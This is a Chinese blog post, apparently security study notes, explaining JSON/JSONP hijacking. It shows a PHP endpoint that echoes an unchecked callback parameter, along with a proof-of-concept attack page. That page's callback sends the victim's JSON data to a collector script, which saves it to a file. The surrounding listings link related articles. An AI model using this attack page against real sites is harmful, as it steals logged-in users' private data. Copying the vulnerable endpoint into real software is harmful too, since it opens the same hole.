json劫持漏洞

最新推荐文章于 2023-07-23 19:09:17 发布
最新推荐文章于 2023-07-23 19:09:17 发布
阅读量332 收藏
点赞数
分类专栏: 暗月笔记 文章标签: json php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RMC131/article/details/130251960
版权
JSON劫持是攻击者在用户认证状态下,通过拦截并篡改JSON数据来窃取敏感信息的一种攻击方式。测试过程包括寻找JSON类型页面,构造攻击页面,诱导用户访问以获取并转发数据。示例中展示了如何通过回调函数劫持数据并将其发送到攻击者的服务器。防范措施通常涉及改进数据传输和验证机制。
摘要由CSDN通过智能技术生成

json劫持漏洞

JSON是一种轻量级的数据交换格式,劫持就对数据进行窃取。攻击者通过某些特定的手段。将本应返回已给用户的JSON数据进行拦截,转发给攻击者。一般劫持的JSON数据都是包含敏感信息或者有价值的数据

攻击方法与CSRF类似。需要用户登录账号,在身份是认证没有消除的情况下访问攻击者设计好的页面。进而获取JSON数据,并转发给攻击者。

测试方法

找到json类型的页面 -> 构建攻击页面 -> 诱导目标访问页面 -> 获取数据

//json.php
<?php
header('Content-type: application/json');
$callback = $_GET['callback'];
print $callback.'({"id" : "1","name" : "moonsec","email":"moon@moonsec.com"});';
?>

劫持测试页面

<!-- json_test.html -->
<!DOCTYPE html>
<html lan="en">
    <head>
    <meta charset="UTF-8">
    <title>json劫持</title>
    <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
    </head>
    <body>
        <script>function jsonp2(data){alert(JSON.stringify(data));}</script>
        <script src ="http://www.webtester.com/json.php?callback=jsonp2"></script>
    </body>
</html>

劫持json发送返回数据

<!-- json_attack.html -->
<!DOCTYPE html>
<html lan="en">
<head>
    <meta charset="UTF-8">
    <title>json劫持发送返回数据</title>
    <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
    <script>
        function test(data){
            //alert(v.name);
            var xmlhttp = new XMLHttpRequest();
            var url = "http://127.0.0.1/json/1.php?file=" + JSON.stringify(data);
            xmlhttp.open("GET",url,true);
            xmlhttp.send();
            }
    </script>
    <script src ="http://www.webtester.com/json.php?callback=test"></script>
</head>
    <body>   
    </body>
</html>

//1.php
<?php
if($_GET['file']){
   file_put_contents('json.txt', $_GET['file']);
}
?>

访问json_atack.html劫持json数据传到1.php,保存到json.txt

RICKC131
关注
专栏目录
JSON劫持漏洞
W404129262的博客
07-15 900
项目在运行当中被安全部扫描扫描得到了JSON漏洞。一开始想着是把JSON包提高包的等级,但是还是没有解决掉JSON劫持的问题,安全部扫描后得到了一系列的修复漏洞方式,先把背景和对方提供的解决方案发出来。 这是关于漏洞背景方面 采用JSON文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,各种大型网站都开始使用,包括Yahoo,Google,Tencent,Baidu等等。 但是如果这种交互的方式用来传递敏感的数据,并且传输的时候没有做太多...
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7672
​介绍 JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。 更通俗的说法:JSONP 就是利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
详解JSONJSONP劫持以及解决方法
10-17
主要介绍了详解JSONJSONP劫持以及解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
JSONP数据劫持漏洞
qq_50854662的博客
04-19 1186
JSONP数据劫持漏洞
JSON劫持漏洞(详细讲解利用JSON从而进行数据劫持漏洞攻防策略)
热门推荐
程宇寒
05-24 2万+
英文原文:JSON Hijacking英汉对照:JSON Hijacking 翻译对照原文解析:JSON劫持漏洞分析和攻防演练声明(阅读前必读!!!):转载自这篇文章本人是一个英语渣,英语四级都没过。翻译此文存粹用于英语学习,而且大部分还是用翻译软件翻译的。请谨慎阅读此译文,注意不要被译文雷到。另外这是一篇2009年的老文章了,里面有部分知识可能已经过时了,不过文章中关于JSON劫持的知识大部分还...
JSON劫持漏洞分析
Fly_鹏程万里
05-17 5447
什么是JSON劫持单从字面上就可以理解的出来,JSON是一种轻量级的数据交换格式,而劫持就是对数据进行窃取(或者应该称为打劫、拦截比较合适。恶意攻击者通过某些特定的手段,将本应该返回给用户的JSON数据进行拦截,转而将数据发送回给恶意攻击者,这就是JSON劫持的大概含义。一般来说进行劫持JSON数据都是包含敏感信息或者有价值的数据。造成JSON劫持漏洞的成因正所谓无风不起浪,无根不长草,要发动一...
JSONP 劫持漏洞实例
11-15 2024
0x01 Jsonp简介 Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 为什么我们从不同的域(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略。 同源策略,它是由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略。 ...
101.网络安全渗透测试—[常规漏洞挖掘与利用篇17]—[json劫持漏洞与测试]
m0_67265464的博客
02-24 5869
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、json劫持漏洞概念 (1)json劫持概念 (2)json劫持攻击 二、json劫持漏洞测试 (1)json劫持漏洞测试流程与方法 (2)json漏洞页面源码:`json.php` (3)测试json.php是否存在漏洞:`json-poc.html` (4)劫持json数据,发送给远程服务器 一、json劫持漏洞概念 (1)json劫持概念 JSON是一种轻量级的数据交换格式,而劫持
java json injection_JSON相关漏洞(Hijacking+Injection)挖掘技巧及实战案例全汇总
weixin_36062835的博客
02-19 1044
本文一是在为测试过程中遇到json返回格式时提供测试思路,二是几乎所有国内的资料都混淆了jsonjsonp的区别——这是两种技术;以及jsonjsonphijacking的区别——这是两个漏洞,这里做个解释。1、概念1)什么是jsonjson(JavaScript Object Notation, JS 对象标记) 是一种轻量级的数据交换格式。JSON最常用的格式是对象的键值对,例如下面这样...
json劫持学习
qq_46804551的博客
10-12 683
JSON劫持 json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。 一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。 靶场练习 POC <!DOCTYPE html> <html lang="en"> <head> <m
php-dos-attack:利用PHPjson_decode漏洞
05-13
PHP服务器上模拟哈希冲突攻击 签出。 这个怎么运作 PHP哈希表容易受到复杂性攻击。 因此,每个需要外部输入并在PHP哈希表中进行解析的函数都容易受到复杂性攻击。 测试PHP漏洞以进行碰撞攻击 在目录test ,有PHP脚本演示了使用PHP映射的函数的漏洞。 文件collision_keys_small.txt仅包含1万个条目。 如果您想测试真实交易,则应使用collision_keys.txt (64k条目)尝试这些攻击。 运行测试 运行测试以将冲突键插入数组: docker run -it \ -v "$PWD":/usr/src/app -w /usr/src/app php:5.6-cli \ php test/array.php collision_keys.txt 运行测试以针对具有冲突键的JSON键值对调用json_decode : docker run -it -
JSON劫持漏洞攻防原理及演练
hanqing
01-11 2227
注* 作者发表这篇文章的时间较早,某些方法可能并不是最好的解决方案,但针对这种漏洞进行的攻击还依然可见,如早期的:QQMail邮件泄露漏洞,下面介绍的是对这种攻击原理的介绍。   不久之前,我写了一篇文章《一个微妙的JSON漏洞》,文中讲到这个漏洞可能会导致敏感信息泄露。针对该漏洞的特点,通过覆盖JavaScript数组构造函数以窃取(暴露)JSON返回数组,而现在大多数浏览器还无法防范这种
浅谈JSONP劫持漏洞
最新发布
我的博客,不一样的自我表达
07-23 279
那么攻击者可以构造url:http://127.0.0.1/aphp.test.html或http://127.0.0.1/attack.htm?例如http://aphp.test/jsonp/test_jsonp.php?一般开发中,前端可以很方便的调用,一般输出Callback都是可定制的,如果过滤不严格,或者Content-Type设置不合适,就会导致xss。由于浏览器同源策略的限制,浏览器只允许XmlHttpRequest请求当前相同(域名、协议、端口)的资源,对请求脚本资源没有限制。
浅谈CSRF跨域读取型漏洞JSONP劫持
记录学习,一起进步
03-06 1000
CSRF跨域读取型漏洞JSONP劫持
Json hijacking/Json劫持漏洞
weixin_34050389的博客
03-08 623
xsser · 2012/12/28 17:450x00 相关背景介绍JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。它基于JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999的一个子集。 JSON采用完全...
php json_ 漏洞,OpenCart json_decode函数中存在远程PHP代码执行漏洞
weixin_33423069的博客
04-10 1232
发现OpenCartjson_decode函数中存在远程PHP代码执行漏洞,涉及到的版本有2.1.0.2到2.2.0.0(最新版本)漏洞存在于/upload/system/helper/json.php中,其中有这段代码123456789#/upload/system/helper/json.php$match='/".*?(?$string=preg_replace($mat...
PHP JSON的BUG
weixin_34241036的博客
05-16 92
将下面的数组进行 JSON 编码时出错,编码中丢掉了最后一维数组中的下标。 Array ( [1] => Array ( [0] => Array ( [0] => Array ...
Ajax跨域:Jsonp原理解析
weixin_34218579的博客
03-09 781
关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 &lt;script&gt;&lt;/script&gt; 元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ): ...
JavaScript安全漏洞分析与自动化检测
当JavaScript代码负责处理敏感数据或执行关键业务逻辑时,这些漏洞可能导致严重的安全问题,如跨站脚本攻击(XSS)、会话劫持、恶意代码注入等。 一、JavaScript常见安全漏洞 1. 跨站脚本攻击(XSS): XSS分为存储型、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值